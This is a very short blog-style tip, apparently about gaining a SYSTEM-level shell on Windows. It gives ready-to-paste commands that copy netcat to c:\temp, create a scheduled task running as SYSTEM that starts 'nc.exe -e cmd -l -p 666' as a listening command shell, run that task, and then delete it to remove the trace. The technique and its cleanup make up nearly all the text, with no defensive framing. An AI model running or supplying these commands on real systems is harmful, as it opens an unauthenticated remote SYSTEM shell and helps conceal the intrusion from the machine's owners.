Reading Time: < 1 minute

A classic way to achieve this is via Scheduled Task

Copy netcat to c:\temp (for example)

schtasks /create /RU SYSTEM /SC weekly /D Sat /TN SysMe /TR “c:\temp\nc.exe -e cmd -l -p 666” /ST 10:00:00

and then run it with

Schtasks /run /TN SysMe

to delete afterwards

schtasks /delete /TN SysMe

0